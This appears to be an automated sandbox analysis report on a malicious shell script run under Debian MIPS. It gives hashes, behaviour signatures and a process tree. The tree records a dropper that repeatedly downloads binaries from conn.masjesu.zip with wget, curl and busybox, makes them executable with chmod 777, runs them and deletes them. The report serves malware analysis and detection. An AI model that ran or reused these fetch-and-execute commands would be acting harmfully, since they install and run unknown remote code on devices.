Analysis
-
max time kernel
77s -
max time network
75s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:58
Static task
static1
Behavioral task
behavioral1
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
-
Size
10KB
-
MD5
bbba4f3429254ccf3146e90fd7eca8df
-
SHA1
5612421d8eddf3b60c95612c6859a6cdea063425
-
SHA256
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f
-
SHA512
ca81a0d5a2107b1eaf232a9fbf60127c3dc672aef021a3102ff2dd11228b4b249ca357a421912ae90496b2829f5953e6f70e49b1775295c01ad555fc9c896853
-
SSDEEP
96:YmWkL7n777oVdRLuefddkNGN2NkaLn0j/6UueqRJTLWGpEIDTv//pNNsX92Lglg/:zn73oVdR8eOkOlp/TsG/MS73oVdEeOke
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 742 chmod 911 chmod 946 chmod 831 chmod 932 chmod 981 chmod 749 chmod 801 chmod 1002 chmod 1009 chmod 883 chmod 988 chmod 808 chmod 862 chmod 904 chmod 869 chmod 890 chmod 897 chmod 918 chmod 925 chmod 967 chmod 995 chmod 876 chmod 939 chmod 960 chmod 974 chmod 852 chmod 953 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg 743 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 750 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 802 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb 809 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 832 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q 853 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL 863 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz 870 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 877 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q 884 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh 891 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ 898 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 905 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza 912 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz 919 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 926 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q 933 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh 940 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ 947 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 954 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza 961 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg 968 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 975 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 982 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb 989 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 996 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q 1003 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL 1010 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 882 busybox 886 wget 889 busybox 893 wget 914 wget 921 wget 938 busybox 837 wget 980 busybox 879 wget 868 busybox 807 busybox 824 busybox 855 wget 903 busybox 936 curl 719 wget 811 wget 873 curl 875 busybox 901 curl 746 curl 865 wget 910 busybox 942 wget 959 busybox 966 busybox 1008 busybox 805 curl 908 curl 952 busybox 985 curl 740 busybox 866 curl 887 curl 924 busybox 970 wget 978 curl 753 curl 907 wget 915 curl 917 busybox 935 wget 957 curl 999 curl 851 busybox 894 curl 804 wget 872 wget 880 curl 896 busybox 900 wget 945 busybox 949 wget 987 busybox 861 busybox 998 wget 992 curl 991 wget 1001 busybox 1006 curl 922 curl 856 curl 956 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 curl File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 curl File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza curl File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ curl File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 curl File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh curl File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 curl File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb curl File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 curl File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q curl File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ curl File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 curl File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg curl File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q curl File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz curl File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 curl File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz curl File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg curl File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 curl File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb curl File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh curl File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL curl File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q curl File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL curl File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 curl File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza curl File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 curl File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q curl
Processes
-
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:748
-
-
/bin/chmodchmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:798
-
-
/bin/chmodchmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:803
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:804
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:931
-
-
/bin/chmodchmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵PID:941
-
-
